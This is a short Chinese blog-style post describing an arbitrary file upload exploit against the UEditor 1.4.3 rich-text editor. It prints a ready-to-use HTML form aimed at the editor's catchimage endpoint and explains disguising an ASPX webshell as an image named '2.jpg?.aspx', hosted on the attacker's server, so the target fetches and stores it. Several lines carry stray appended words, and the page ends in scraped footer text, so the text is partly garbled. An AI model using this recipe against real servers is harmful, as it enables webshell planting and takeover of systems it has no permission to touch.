UEditor 1.4.3 任意文件上傳漏洞

今天測試一個項目,進到後臺以後發現使用富文本web編輯器html

image


構造一個惡意的html文件,方便咱們傳輸數據過去: xxxx爲攻擊地址web

<form action="http://xxxxxxxxx/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"  method="POST">   <p>shell addr:<input type="text" name="source[]" /></p >   <inputtype="submit" value="Submit" />

</form>

而後製做一個圖片馬,文件名改成2.jpg?.aspx上傳至本身的服務器,經過構造的惡意html進行上傳shell

image

個人被安全設備攔截了安全

image


看看別人成功的案例服務器

image

相關文章
相關標籤/搜索